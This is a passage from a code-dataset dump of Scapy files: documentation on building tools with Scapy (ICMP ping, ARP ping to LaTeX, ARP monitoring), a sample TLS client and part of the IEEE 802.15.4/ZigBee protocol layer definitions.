6\n ~ test_set_2 hardest\n print e\n e == 1296\n\nTo see an example that is targeted to Scapy, go to http://www.secdev.org/projects/UTscapy. 
Cut and paste the example at the bottom of the page to the file ``demo_campaign.txt`` and run UTScapy against it::\n\n./test/run_tests -t demo_campaign.txt -f html -o demo_campaign.html -F -l\n\nExamine the output generated in file ``demo_campaign.html``.\n" }, { "alpha_fraction": 0.6238797307014465, "alphanum_fraction": 0.6441168189048767, "avg_line_length": 34.96875, "blob_id": "5653a0407c4088c561db76a528631963ef6215f3", "content_id": "410af8e11f381fd6430ca3e33e957346e0194b82", "detected_licenses": [ "GPL-2.0-only", "LicenseRef-scancode-other-permissive", "GPL-1.0-or-later", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 3459, "license_type": "permissive", "max_line_length": 269, "num_lines": 96, "path": "/scapy/doc/scapy/extending.rst", "repo_name": "jreynders/BLESuite-1", "src_encoding": "UTF-8", "text": "********************\nBuild your own tools\n********************\n\nYou can use Scapy to make your own automated tools. You can also extend Scapy without having to edit its source file.\n\nIf you have built some interesting tools, please contribute back to the github wiki !\n\n \nUsing Scapy in your tools\n=========================\nYou can easily use Scapy in your own tools. Just import what you need and do it.\n\nThis first example takes an IP or a name as first parameter, send an ICMP echo request packet and display the completely dissected return packet::\n\n #! /usr/bin/env python\n \n import sys\n from scapy.all import sr1,IP,ICMP\n \n p=sr1(IP(dst=sys.argv[1])/ICMP())\n if p:\n p.show()\n\nThis is a more complex example which does an ARP ping and reports what it found with LaTeX formatting::\n\n #! /usr/bin/env python\n # arping2tex : arpings a network and outputs a LaTeX table as a result\n \n import sys\n if len(sys.argv) != 2:\n print \"Usage: arping2tex <net>\\n eg: arping2tex 192.168.1.0/24\"\n sys.exit(1)\n \n from scapy.all import srp,Ether,ARP,conf\n conf.verb=0\n ans,unans=srp(Ether(dst=\"ff:ff:ff:ff:ff:ff\")/ARP(pdst=sys.argv[1]),\n timeout=2)\n \n print r\"\\begin{tabular}{|l|l|}\"\n print r\"\\hline\"\n print r\"MAC & IP\\\\\"\n print r\"\\hline\"\n for snd,rcv in ans:\n print rcv.sprintf(r\"%Ether.src% & %ARP.psrc%\\\\\")\n print r\"\\hline\"\n print r\"\\end{tabular}\"\n\nHere is another tool that will constantly monitor all interfaces on a machine and print all ARP request it sees, even on 802.11 frames from a Wi-Fi card in monitor mode. Note the store=0 parameter to sniff() to avoid storing all packets in memory for nothing::\n\n #! /usr/bin/env python\n from scapy.all import *\n \n def arp_monitor_callback(pkt):\n if ARP in pkt and pkt[ARP].op in (1,2): #who-has or is-at\n return pkt.sprintf(\"%ARP.hwsrc% %ARP.psrc%\")\n \n sniff(prn=arp_monitor_callback, filter=\"arp\", store=0)\n\nFor a real life example, you can check `Wifitap <http://sid.rstack.org/static/articles/w/i/f/Wifitap_EN_9613.html>`_.\n\n\nExtending Scapy with add-ons\n============================\n\nIf you need to add some new protocols, new functions, anything, you can write it directly into Scapy's source file. But this is not very convenient. Even if those modifications are to be integrated into Scapy, it can be more convenient to write them in a separate file.\n\nOnce you've done that, you can launch Scapy and import your file, but this is still not very convenient. Another way to do that is to make your file executable and have it call the Scapy function named interact()::\n\n #! 
/usr/bin/env python\n \n # Set log level to benefit from Scapy warnings\n import logging\n logging.getLogger(\"scapy\").setLevel(1)\n \n from scapy.all import *\n \n class Test(Packet):\n name = \"Test packet\"\n fields_desc = [ ShortField(\"test1\", 1),\n ShortField(\"test2\", 2) ]\n \n def make_test(x,y):\n return Ether()/IP()/Test(test1=x,test2=y)\n \n if __name__ == \"__main__\":\n interact(mydict=globals(), mybanner=\"Test add-on v3.14\")\n\n\nIf you put the above listing in the test_interact.py file and make it executable, you'll get::\n\n # ./test_interact.py \n Welcome to Scapy (0.9.17.109beta)\n Test add-on v3.14\n >>> make_test(42,666)\n <Ether type=0x800 |<IP |<Test test1=42 test2=666 |>>>\n \n\n" }, { "alpha_fraction": 0.6433120965957642, "alphanum_fraction": 0.6719745397567749, "avg_line_length": 27.515151977539062, "blob_id": "0e2b2ffc339615b5b5ddcdd2fd5524d191cc0a4c", "content_id": "31a1fcefd2be1b0f16afb19604e5775136ff6997", "detected_licenses": [ "GPL-2.0-only", "LicenseRef-scancode-other-permissive", "GPL-1.0-or-later", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 942, "license_type": "permissive", "max_line_length": 75, "num_lines": 33, "path": "/scapy/test/tls/example_client.py", "repo_name": "jreynders/BLESuite-1", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n## This file is part of Scapy\n## This program is published under a GPLv2 license\n\n\"\"\"\nBasic TLS client. A ciphersuite may be commanded via a first argument.\nDefault protocol version is TLS 1.2.\n\nFor instance, \"sudo ./client_simple.py c014\" will try to connect to any TLS\nserver at 127.0.0.1:4433, with suite TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA.\n\"\"\"\n\nimport os\nimport sys\n\nbasedir = os.path.abspath(os.path.join(os.path.dirname(__file__),\"../../\"))\nsys.path=[basedir]+sys.path\n\nfrom scapy.layers.tls.automaton_cli import TLSClientAutomaton\nfrom scapy.layers.tls.handshake import TLSClientHello\n\n\nif len(sys.argv) == 2:\n ch = TLSClientHello(ciphers=int(sys.argv[1], 16))\nelse:\n ch = None\n\nt = TLSClientAutomaton(client_hello=ch,\n version=\"tls13-d18\",\n mycert=basedir+\"/test/tls/pki/cli_cert.pem\",\n mykey=basedir+\"/test/tls/pki/cli_key.pem\")\nt.run()\n\n" }, { "alpha_fraction": 0.5714829564094543, "alphanum_fraction": 0.6197667717933655, "avg_line_length": 41.534217834472656, "blob_id": "93b9253f1293d02e988fff26f76297f3ecbdb0a1", "content_id": "18f27a73c52c4545e612ac002be8547a0cab383b", "detected_licenses": [ "MIT", "GPL-2.0-only", "LicenseRef-scancode-other-permissive", "GPL-1.0-or-later" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 57804, "license_type": "permissive", "max_line_length": 187, "num_lines": 1359, "path": "/scapy/scapy/layers/dot15d4.py", "repo_name": "jreynders/BLESuite-1", "src_encoding": "UTF-8", "text": "# This program is published under a GPLv2 license\n# This file is part of Scapy\n# See http://www.secdev.org/projects/scapy for more informations\n# Copyright (C) Ryan Speers <ryan@rmspeers.com> 2011-2012\n# Copyright (C) Roger Meyer <roger.meyer@csus.edu>: 2012-03-10 Added frames\n# Copyright (C) Gabriel Potter <gabriel@potter.fr>: 2018\n# Intern at INRIA Grand Nancy Est\n# This program is published under a GPLv2 license\n\n\"\"\"\nWireless MAC according to IEEE 802.15.4.\n\"\"\"\n\nimport re\nimport struct\n\nfrom scapy.compat import orb, raw\n\nfrom scapy.packet import *\nfrom scapy.fields import *\n\nfrom scapy.layers.ntp import TimeStampField\nfrom scapy.layers.inet 
import UDP\n\n# ZigBee Cluster Library Identifiers, Table 2.2 ZCL\n_zcl_cluster_identifier = {\n # Functional Domain: General\n 0x0000: \"basic\",\n 0x0001: \"power_configuration\",\n 0x0002: \"device_temperature_configuration\",\n 0x0003: \"identify\",\n 0x0004: \"groups\",\n 0x0005: \"scenes\",\n 0x0006: \"on_off\",\n 0x0007: \"on_off_switch_configuration\",\n 0x0008: \"level_control\",\n 0x0009: \"alarms\",\n 0x000a: \"time\",\n 0x000b: \"rssi_location\",\n 0x000c: \"analog_input\",\n 0x000d: \"analog_output\",\n 0x000e: \"analog_value\",\n 0x000f: \"binary_input\",\n 0x0010: \"binary_output\",\n 0x0011: \"binary_value\",\n 0x0012: \"multistate_input\",\n 0x0013: \"multistate_output\",\n 0x0014: \"multistate_value\",\n 0x0015: \"commissioning\",\n # 0x0016 - 0x00ff reserved\n # Functional Domain: Closures\n 0x0100: \"shade_configuration\",\n # 0x0101 - 0x01ff reserved\n # Functional Domain: HVAC\n 0x0200: \"pump_configuration_and_control\",\n 0x0201: \"thermostat\",\n 0x0202: \"fan_control\",\n 0x0203: \"dehumidification_control\",\n 0x0204: \"thermostat_user_interface_configuration\",\n # 0x0205 - 0x02ff reserved\n # Functional Domain: Lighting\n 0x0300: \"color_control\",\n 0x0301: \"ballast_configuration\",\n # Functional Domain: Measurement and sensing\n 0x0400: \"illuminance_measurement\",\n 0x0401: \"illuminance_level_sensing\",\n 0x0402: \"temperature_measurement\",\n 0x0403: \"pressure_measurement\",\n 0x0404: \"flow_measurement\",\n 0x0405: \"relative_humidity_measurement\",\n 0x0406: \"occupancy_sensing\",\n # Functional Domain: Security and safethy\n 0x0500: \"ias_zone\",\n 0x0501: \"ias_ace\",\n 0x0502: \"ias_wd\",\n # Functional Domain: Protocol Interfaces\n 0x0600: \"generic_tunnel\",\n 0x0601: \"bacnet_protocol_tunnel\",\n 0x0602: \"analog_input_regular\",\n 0x0603: \"analog_input_extended\",\n 0x0604: \"analog_output_regular\",\n 0x0605: \"analog_output_extended\",\n 0x0606: \"analog_value_regular\",\n 0x0607: \"analog_value_extended\",\n 0x0608: \"binary_input_regular\",\n 0x0609: \"binary_input_extended\",\n 0x060a: \"binary_output_regular\",\n 0x060b: \"binary_output_extended\",\n 0x060c: \"binary_value_regular\",\n 0x060d: \"binary_value_extended\",\n 0x060e: \"multistate_input_regular\",\n 0x060f: \"multistate_input_extended\",\n 0x0610: \"multistate_output_regular\",\n 0x0611: \"multistate_output_extended\",\n 0x0612: \"multistate_value_regular\",\n 0x0613: \"multistate_value\",\n # Smart Energy Profile Clusters\n 0x0700: \"price\",\n 0x0701: \"demand_response_and_load_control\",\n 0x0702: \"metering\",\n 0x0703: \"messaging\",\n 0x0704: \"smart_energy_tunneling\",\n 0x0705: \"prepayment\",\n # Functional Domain: General\n # Key Establishment\n 0x0800: \"key_establishment\",\n}\n\n# ZigBee stack profiles\n_zcl_profile_identifier = {\n 0x0000: \"ZigBee_Stack_Profile_1\",\n 0x0101: \"IPM_Industrial_Plant_Monitoring\",\n 0x0104: \"HA_Home_Automation\",\n 0x0105: \"CBA_Commercial_Building_Automation\",\n 0x0107: \"TA_Telecom_Applications\",\n 0x0108: \"HC_Health_Care\",\n 0x0109: \"SE_Smart_Energy_Profile\",\n}\n\n# ZigBee Cluster Library, Table 2.8 ZCL Command Frames\n_zcl_command_frames = {\n 0x00: \"read_attributes\",\n 0x01: \"read_attributes_response\",\n 0x02: \"write_attributes_response\",\n 0x03: \"write_attributes_undivided\",\n 0x04: \"write_attributes_response\",\n 0x05: \"write_attributes_no_response\",\n 0x06: \"configure_reporting\",\n 0x07: \"configure_reporting_response\",\n 0x08: \"read_reporting_configuration\",\n 0x09: 
\"read_reporting_configuration_response\",\n 0x0a: \"report_attributes\",\n 0x0b: \"default_response\",\n 0x0c: \"discover_attributes\",\n 0x0d: \"discover_attributes_response\",\n # 0x0e - 0xff Reserved\n}\n\n# ZigBee Cluster Library, Table 2.16 Enumerated Status Values\n_zcl_enumerated_status_values = {\n 0x00: \"SUCCESS\",\n 0x02: \"FAILURE\",\n # 0x02 - 0x7f Reserved\n 0x80: \"MALFORMED_COMMAND\",\n 0x81: \"UNSUP_CLUSTER_COMMAND\",\n 0x82: \"UNSUP_GENERAL_COMMAND\",\n 0x83: \"UNSUP_MANUF_CLUSTER_COMMAND\",\n 0x84: \"UNSUP_MANUF_GENERAL_COMMAND\",\n 0x85: \"INVALID_FIELD\",\n 0x86: \"UNSUPPORTED_ATTRIBUTE\",\n 0x87: \"INVALID_VALUE\",\n 0x88: \"READ_ONLY\",\n 0x89: \"INSUFFICIENT_SPACE\",\n 0x8a: \"DUPLICATE_EXISTS\",\n 0x8b: \"NOT_FOUND\",\n 0x8c: \"UNREPORTABLE_ATTRIBUTE\",\n 0x8d: \"INVALID_DATA_TYPE\",\n # 0x8e - 0xbf Reserved\n 0xc0: \"HARDWARE_FAILURE\",\n 0xc1: \"SOFTWARE_FAILURE\",\n 0xc2: \"CALIBRATION_ERROR\",\n # 0xc3 - 0xff Reserved\n}\n\n# ZigBee Cluster Library, Table 2.15 Data Types\n_zcl_attribute_data_types = {\n 0x00: \"no_data\",\n # General data\n 0x08: \"8-bit_data\",\n 0x09: \"16-bit_data\",\n 0x0a: \"24-bit_data\",\n 0x0b: \"32-bit_data\",\n 0x0c: \"40-bit_data\",\n 0x0d: \"48-bit_data\",\n 0x0e: \"56-bit_data\",\n 0x0f: \"64-bit_data\",\n # Logical\n 0x10: \"boolean\",\n # Bitmap\n 0x18: \"8-bit_bitmap\",\n 0x19: \"16-bit_bitmap\",\n 0x1a: \"24-bit_bitmap\",\n 0x1b: \"32-bit_bitmap\",\n 0x1c: \"40-bit_bitmap\",\n 0x1d: \"48-bit_bitmap\",\n 0x1e: \"56-bit_bitmap\",\n 0x1f: \"64-bit_bitmap\",\n # Unsigned integer\n 0x20: \"Unsigned_8-bit_integer\",\n 0x21: \"Unsigned_16-bit_integer\",\n 0x22: \"Unsigned_24-bit_integer\",\n 0x23: \"Unsigned_32-bit_integer\",\n 0x24: \"Unsigned_40-bit_integer\",\n 0x25: \"Unsigned_48-bit_integer\",\n 0x26: \"Unsigned_56-bit_integer\",\n 0x27: \"Unsigned_64-bit_integer\",\n # Signed integer\n 0x28: \"Signed_8-bit_integer\",\n 0x29: \"Signed_16-bit_integer\",\n 0x2a: \"Signed_24-bit_integer\",\n 0x2b: \"Signed_32-bit_integer\",\n 0x2c: \"Signed_40-bit_integer\",\n 0x2d: \"Signed_48-bit_integer\",\n 0x2e: \"Signed_56-bit_integer\",\n 0x2f: \"Signed_64-bit_integer\",\n # Enumeration\n 0x30: \"8-bit_enumeration\",\n 0x31: \"16-bit_enumeration\",\n # Floating point\n 0x38: \"semi_precision\",\n 0x39: \"single_precision\",\n 0x3a: \"double_precision\",\n # String\n 0x41: \"octet-string\",\n 0x42: \"character_string\",\n 0x43: \"long_octet_string\",\n 0x44: \"long_character_string\",\n # Ordered sequence\n 0x48: \"array\",\n 0x4c: \"structure\",\n # Collection\n 0x50: \"set\",\n 0x51: \"bag\",\n # Time\n 0xe0: \"time_of_day\",\n 0xe1: \"date\",\n 0xe2: \"utc_time\",\n # Identifier\n 0xe8: \"cluster_id\",\n 0xe9: \"attribute_id\",\n 0xea: \"bacnet_oid\",\n # Miscellaneous\n 0xf0: \"ieee_address\",\n 0xf1: \"128-bit_security_key\",\n # Unknown\n 0xff: \"unknown\",\n}\n\n# Fields #\n\n\nclass dot15d4AddressField(Field):\n __slots__ = [\"adjust\", \"length_of\"]\n\n def __init__(self, name, default, length_of=None, fmt=\"<H\", adjust=None):\n Field.__init__(self, name, default, fmt)\n self.length_of = length_of\n if adjust is not None:\n self.adjust = adjust\n else:\n self.adjust = lambda pkt, x: self.lengthFromAddrMode(pkt, x)\n\n def i2repr(self, pkt, x):\n \"\"\"Convert internal value to a nice representation\"\"\"\n if len(hex(self.i2m(pkt, x))) < 7: # short address\n return hex(self.i2m(pkt, x))\n else: # long address\n x = \"%016x\" % self.i2m(pkt, x)\n return \":\".join([\"%s%s\" % (x[i], x[i + 1]) for i in range(0, len(x), 2)])\n\n def 
addfield(self, pkt, s, val):\n \"\"\"Add an internal value to a string\"\"\"\n if self.adjust(pkt, self.length_of) == 2:\n return s + struct.pack(self.fmt[0] + \"H\", val)\n elif self.adjust(pkt, self.length_of) == 8:\n return s + struct.pack(self.fmt[0] + \"Q\", val)\n else:\n return s\n\n def getfield(self, pkt, s):\n if self.adjust(pkt, self.length_of) == 2:\n return s[2:], self.m2i(pkt, struct.unpack(self.fmt[0] + \"H\", s[:2])[0])\n elif self.adjust(pkt, self.length_of) == 8:\n return s[8:], self.m2i(pkt, struct.unpack(self.fmt[0] + \"Q\", s[:8])[0])\n else:\n raise Exception('impossible case')\n\n def lengthFromAddrMode(self, pkt, x):\n addrmode = 0\n pkttop = pkt.underlayer\n while True:\n try:\n addrmode = pkttop.getfieldval(x)\n break\n except:\n if pkttop.underlayer is None:\n break\n pkttop = pkttop.underlayer\n # print \"Underlayer field value of\", x, \"is\", addrmode\n if addrmode == 2:\n return 2\n elif addrmode == 3:\n return 8\n return 0\n\n\n# class dot15d4Checksum(LEShortField,XShortField):\n# def i2repr(self, pkt, x):\n# return XShortField.i2repr(self, pkt, x)\n# def addfield(self, pkt, s, val):\n# return s\n# def getfield(self, pkt, s):\n# return s\n\n\n# Layers #\n\nclass Dot15d4(Packet):\n name = \"802.15.4\"\n fields_desc = [\n BitField(\"fcf_reserved_1\", 0, 1), # fcf p1 b1\n BitEnumField(\"fcf_panidcompress\", 0, 1, [False, True]),\n BitEnumField(\"fcf_ackreq\", 0, 1, [False, True]),\n BitEnumField(\"fcf_pending\", 0, 1, [False, True]),\n BitEnumField(\"fcf_security\", 0, 1, [False, True]), # fcf p1 b2\n Emph(BitEnumField(\"fcf_frametype\", 0, 3, {0: \"Beacon\", 1: \"Data\", 2: \"Ack\", 3: \"Command\"})),\n BitEnumField(\"fcf_srcaddrmode\", 0, 2, {0: \"None\", 1: \"Reserved\", 2: \"Short\", 3: \"Long\"}), # fcf p2 b1\n BitField(\"fcf_framever\", 0, 2), # 00 compatibility with 2003 version; 01 compatible with 2006 version\n BitEnumField(\"fcf_destaddrmode\", 2, 2, {0: \"None\", 1: \"Reserved\", 2: \"Short\", 3: \"Long\"}), # fcf p2 b2\n BitField(\"fcf_reserved_2\", 0, 2),\n Emph(ByteField(\"seqnum\", 1)) # sequence number\n ]\n\n def mysummary(self):\n return self.sprintf(\"802.15.4 %Dot15d4.fcf_frametype% ackreq(%Dot15d4.fcf_ackreq%) ( %Dot15d4.fcf_destaddrmode% -> %Dot15d4.fcf_srcaddrmode% ) Seq#%Dot15d4.seqnum%\")\n\n def guess_payload_class(self, payload):\n if self.fcf_frametype == 0x00:\n return Dot15d4Beacon\n elif self.fcf_frametype == 0x01:\n return Dot15d4Data\n elif self.fcf_frametype == 0x02:\n return Dot15d4Ack\n elif self.fcf_frametype == 0x03:\n return Dot15d4Cmd\n else:\n return Packet.guess_payload_class(self, payload)\n\n def answers(self, other):\n if isinstance(other, Dot15d4):\n if self.fcf_frametype == 2: # ack\n if self.seqnum != other.seqnum: # check for seqnum matching\n return 0\n elif other.fcf_ackreq == 1: # check that an ack was indeed requested\n return 1\n return 0\n\n def post_build(self, p, pay):\n # This just forces destaddrmode to None for Ack frames.\n # TODO find a more elegant way to do this\n if self.fcf_frametype == 2 and self.fcf_destaddrmode != 0:\n self.fcf_destaddrmode = 0\n return raw(self)\n else:\n return p + pay\n\n\nclass Dot15d4FCS(Dot15d4, Packet):\n '''\n This class is a drop-in replacement for the Dot15d4 class above, except\n it expects a FCS/checksum in the input, and produces one in the output.\n This provides the user flexibility, as many 802.15.4 interfaces will have an AUTO_CRC setting\n that will validate the FCS/CRC in firmware, and add it automatically when transmitting.\n '''\n\n def pre_dissect(self, 
s):\n \"\"\"Called right before the current layer is dissected\"\"\"\n if (makeFCS(s[:-2]) != s[-2:]): # validate the FCS given\n warning(\"FCS on this packet is invalid or is not present in provided bytes.\")\n return s # if not valid, pretend there was no FCS present\n return s[:-2] # otherwise just disect the non-FCS section of the pkt\n\n def post_build(self, p, pay):\n # This just forces destaddrmode to None for Ack frames.\n # TODO find a more elegant way to do this\n if self.fcf_frametype == 2 and self.fcf_destaddrmode != 0:\n self.fcf_destaddrmode = 0\n return raw(self)\n else:\n return p + pay + makeFCS(p + pay) # construct the packet with the FCS at the end\n\n\nclass Dot15d4Ack(Packet):\n name = \"802.15.4 Ack\"\n fields_desc = []\n\n\nclass Dot15d4AuxSecurityHeader(Packet):\n name = \"802.15.4 Auxiliary Security Header\"\n fields_desc = [\n BitField(\"sec_sc_reserved\", 0, 3),\n # Key Identifier Mode\n # 0: Key is determined implicitly from the originator and receipient(s) of the frame\n # 1: Key is determined explicitly from the the 1-octet Key Index subfield of the Key Identifier field\n # 2: Key is determined explicitly from the 4-octet Key Source and the 1-octet Key Index\n # 3: Key is determined explicitly from the 8-octet Key Source and the 1-octet Key Index\n BitEnumField(\"sec_sc_keyidmode\", 0, 2, {\n 0: \"Implicit\", 1: \"1oKeyIndex\", 2: \"4o-KeySource-1oKeyIndex\", 3: \"8o-KeySource-1oKeyIndex\"}\n ),\n BitEnumField(\"sec_sc_seclevel\", 0, 3, {0: \"None\", 1: \"MIC-32\", 2: \"MIC-64\", 3: \"MIC-128\", \\\n 4: \"ENC\", 5: \"ENC-MIC-32\", 6: \"ENC-MIC-64\", 7: \"ENC-MIC-128\"}),\n XLEIntField(\"sec_framecounter\", 0x00000000), # 4 octets\n # Key Identifier (variable length): identifies the key that is used for cryptographic protection\n # Key Source : length of sec_keyid_keysource varies btwn 0, 4, and 8 bytes depending on sec_sc_keyidmode\n # 4 octets when sec_sc_keyidmode == 2\n ConditionalField(XLEIntField(\"sec_keyid_keysource\", 0x00000000),\n lambda pkt: pkt.getfieldval(\"sec_sc_keyidmode\") == 2),\n # 8 octets when sec_sc_keyidmode == 3\n ConditionalField(LELongField(\"sec_keyid_keysource\", 0x0000000000000000),\n lambda pkt: pkt.getfieldval(\"sec_sc_keyidmode\") == 3),\n # Key Index (1 octet): allows unique identification of different keys with the same originator\n ConditionalField(XByteField(\"sec_keyid_keyindex\", 0xFF),\n lambda pkt: pkt.getfieldval(\"sec_sc_keyidmode\") != 0),\n ]\n\n\nclass Dot15d4Data(Packet):\n name = \"802.15.4 Data\"\n fields_desc = [\n XLEShortField(\"dest_panid\", 0xFFFF),\n dot15d4AddressField(\"dest_addr\", 0xFFFF, length_of=\"fcf_destaddrmode\"),\n ConditionalField(XLEShortField(\"src_panid\", 0x0),\n lambda pkt:util_srcpanid_present(pkt)),\n ConditionalField(dot15d4AddressField(\"src_addr\", None, length_of=\"fcf_srcaddrmode\"),\n lambda pkt:pkt.underlayer.getfieldval(\"fcf_srcaddrmode\") != 0),\n # Security field present if fcf_security == True\n ConditionalField(PacketField(\"aux_sec_header\", Dot15d4AuxSecurityHeader(), Dot15d4AuxSecurityHeader),\n lambda pkt:pkt.underlayer.getfieldval(\"fcf_security\") is True),\n ]\n\n def mysummary(self):\n return self.sprintf(\"802.15.4 Data ( %Dot15d4Data.src_panid%:%Dot15d4Data.src_addr% -> %Dot15d4Data.dest_panid%:%Dot15d4Data.dest_addr% )\")\n\n\nclass Dot15d4Beacon(Packet):\n name = \"802.15.4 Beacon\"\n fields_desc = [\n XLEShortField(\"src_panid\", 0x0),\n dot15d4AddressField(\"src_addr\", None, length_of=\"fcf_srcaddrmode\"),\n # Security field present if fcf_security == True\n 
ConditionalField(PacketField(\"aux_sec_header\", Dot15d4AuxSecurityHeader(), Dot15d4AuxSecurityHeader),\n lambda pkt:pkt.underlayer.getfieldval(\"fcf_security\") is True),\n\n # Superframe spec field:\n BitField(\"sf_sforder\", 15, 4), # not used by ZigBee\n BitField(\"sf_beaconorder\", 15, 4), # not used by ZigBee\n BitEnumField(\"sf_assocpermit\", 0, 1, [False, True]),\n BitEnumField(\"sf_pancoord\", 0, 1, [False, True]),\n BitField(\"sf_reserved\", 0, 1), # not used by ZigBee\n BitEnumField(\"sf_battlifeextend\", 0, 1, [False, True]), # not used by ZigBee\n BitField(\"sf_finalcapslot\", 15, 4), # not used by ZigBee\n\n # GTS Fields\n # GTS Specification (1 byte)\n BitEnumField(\"gts_spec_permit\", 1, 1, [False, True]), # GTS spec bit 7, true=1 iff PAN cord is accepting GTS requests\n BitField(\"gts_spec_reserved\", 0, 4), # GTS spec bits 3-6\n BitField(\"gts_spec_desccount\", 0, 3), # GTS spec bits 0-2\n # GTS Directions (0 or 1 byte)\n ConditionalField(BitField(\"gts_dir_reserved\", 0, 1), lambda pkt:pkt.getfieldval(\"gts_spec_desccount\") != 0),\n ConditionalField(BitField(\"gts_dir_mask\", 0, 7), lambda pkt:pkt.getfieldval(\"gts_spec_desccount\") != 0),\n # GTS List (variable size)\n # TODO add a Packet/FieldListField tied to 3bytes per count in gts_spec_desccount\n\n # Pending Address Fields:\n # Pending Address Specification (1 byte)\n BitField(\"pa_num_short\", 0, 3), # number of short addresses pending\n BitField(\"pa_reserved_1\", 0, 1),\n BitField(\"pa_num_long\", 0, 3), # number of long addresses pending\n BitField(\"pa_reserved_2\", 0, 1),\n # Address List (var length)\n # TODO add a FieldListField of the pending short addresses, followed by the pending long addresses, with max 7 addresses\n # TODO beacon payload\n ]\n\n def mysummary(self):\n return self.sprintf(\"802.15.4 Beacon ( %Dot15d4Beacon.src_panid%:%Dot15d4Beacon.src_addr% ) assocPermit(%Dot15d4Beacon.sf_assocpermit%) panCoord(%Dot15d4Beacon.sf_pancoord%)\")\n\n\nclass Dot15d4Cmd(Packet):\n name = \"802.15.4 Command\"\n fields_desc = [\n XLEShortField(\"dest_panid\", 0xFFFF),\n # Users should correctly set the dest_addr field. 
By default is 0x0 for construction to work.\n dot15d4AddressField(\"dest_addr\", 0x0, length_of=\"fcf_destaddrmode\"),\n ConditionalField(XLEShortField(\"src_panid\", 0x0), \\\n lambda pkt:util_srcpanid_present(pkt)),\n ConditionalField(dot15d4AddressField(\"src_addr\", None, length_of=\"fcf_srcaddrmode\"), \\\n lambda pkt:pkt.underlayer.getfieldval(\"fcf_srcaddrmode\") != 0),\n # Security field present if fcf_security == True\n ConditionalField(PacketField(\"aux_sec_header\", Dot15d4AuxSecurityHeader(), Dot15d4AuxSecurityHeader),\n lambda pkt:pkt.underlayer.getfieldval(\"fcf_security\") is True),\n ByteEnumField(\"cmd_id\", 0, {\n 1: \"AssocReq\", # Association request\n 2: \"AssocResp\", # Association response\n 3: \"DisassocNotify\", # Disassociation notification\n 4: \"DataReq\", # Data request\n 5: \"PANIDConflictNotify\", # PAN ID conflict notification\n 6: \"OrphanNotify\", # Orphan notification\n 7: \"BeaconReq\", # Beacon request\n 8: \"CoordRealign\", # coordinator realignment\n 9: \"GTSReq\" # GTS request\n # 0x0a - 0xff reserved\n }),\n # TODO command payload\n ]\n\n def mysummary(self):\n return self.sprintf(\"802.15.4 Command %Dot15d4Cmd.cmd_id% ( %Dot15dCmd.src_panid%:%Dot15d4Cmd.src_addr% -> %Dot15d4Cmd.dest_panid%:%Dot15d4Cmd.dest_addr% )\")\n\n # command frame payloads are complete: DataReq, PANIDConflictNotify, OrphanNotify, BeaconReq don't have any payload\n # Although BeaconReq can have an optional ZigBee Beacon payload (implemented in ZigBeeBeacon)\n def guess_payload_class(self, payload):\n if self.cmd_id == 1:\n return Dot15d4CmdAssocReq\n elif self.cmd_id == 2:\n return Dot15d4CmdAssocResp\n elif self.cmd_id == 3:\n return Dot15d4CmdDisassociation\n elif self.cmd_id == 8:\n return Dot15d4CmdCoordRealign\n elif self.cmd_id == 9:\n return Dot15d4CmdGTSReq\n else:\n return Packet.guess_payload_class(self, payload)\n\n\nclass Dot15d4CmdCoordRealign(Packet):\n name = \"802.15.4 Coordinator Realign Command\"\n fields_desc = [\n # PAN Identifier (2 octets)\n XLEShortField(\"panid\", 0xFFFF),\n # Coordinator Short Address (2 octets)\n XLEShortField(\"coord_address\", 0x0000),\n # Logical Channel (1 octet): the logical channel that the coordinator intends to use for all future communications\n ByteField(\"channel\", 0),\n # Short Address (2 octets)\n XLEShortField(\"dev_address\", 0xFFFF),\n # Channel page (0/1 octet) TODO optional\n # ByteField(\"channel_page\", 0),\n ]\n\n def mysummary(self):\n return self.sprintf(\"802.15.4 Coordinator Realign Payload ( PAN ID: %Dot15dCmdCoordRealign.pan_id% : channel %Dot15d4CmdCoordRealign.channel% )\")\n\n\n# ZigBee #\n\nclass ZigbeeNWK(Packet):\n name = \"Zigbee Network Layer\"\n fields_desc = [\n BitField(\"discover_route\", 0, 2),\n BitField(\"proto_version\", 2, 4),\n BitEnumField(\"frametype\", 0, 2, {0: 'data', 1: 'command'}),\n FlagsField(\"flags\", 0, 8, ['multicast', 'security', 'source_route', 'extended_dst', 'extended_src', 'reserved1', 'reserved2', 'reserved3']),\n XLEShortField(\"destination\", 0),\n XLEShortField(\"source\", 0),\n ByteField(\"radius\", 0),\n ByteField(\"seqnum\", 1),\n\n ConditionalField(ByteField(\"relay_count\", 1), lambda pkt:pkt.flags & 0x04),\n ConditionalField(ByteField(\"relay_index\", 0), lambda pkt:pkt.flags & 0x04),\n ConditionalField(FieldListField(\"relays\", [], XLEShortField(\"\", 0x0000), count_from=lambda pkt:pkt.relay_count), lambda pkt:pkt.flags & 0x04),\n\n # ConditionalField(XLongField(\"ext_dst\", 0), lambda pkt:pkt.flags & 8),\n ConditionalField(dot15d4AddressField(\"ext_dst\", 0, 
adjust=lambda pkt, x: 8), lambda pkt:pkt.flags & 8),\n # ConditionalField(XLongField(\"ext_src\", 0), lambda pkt:pkt.flags & 16),\n ConditionalField(dot15d4AddressField(\"ext_src\", 0, adjust=lambda pkt, x: 8), lambda pkt:pkt.flags & 16),\n ]\n\n def guess_payload_class(self, payload):\n if self.flags & 0x02:\n return ZigbeeSecurityHeader\n elif self.frametype == 0:\n return ZigbeeAppDataPayload\n elif self.frametype == 1:\n return ZigbeeNWKCommandPayload\n else:\n return Packet.guess_payload_class(self, payload)\n\n\nclass LinkStatusEntry(Packet):\n name = \"ZigBee Link Status Entry\"\n fields_desc = [\n # Neighbor network address (2 octets)\n XLEShortField(\"neighbor_network_address\", 0x0000),\n # Link status (1 octet)\n BitField(\"reserved1\", 0, 1),\n BitField(\"outgoing_cost\", 0, 3),\n BitField(\"reserved2\", 0, 1),\n BitField(\"incoming_cost\", 0, 3),\n ]\n\n\nclass ZigbeeNWKCommandPayload(Packet):\n name = \"Zigbee Network Layer Command Payload\"\n fields_desc = [\n ByteEnumField(\"cmd_identifier\", 1, {\n 1: \"route request\",\n 2: \"route reply\",\n 3: \"network status\",\n 4: \"leave\",\n 5: \"route record\",\n 6: \"rejoin request\",\n 7: \"rejoin response\",\n 8: \"link status\",\n 9: \"network report\",\n 10: \"network 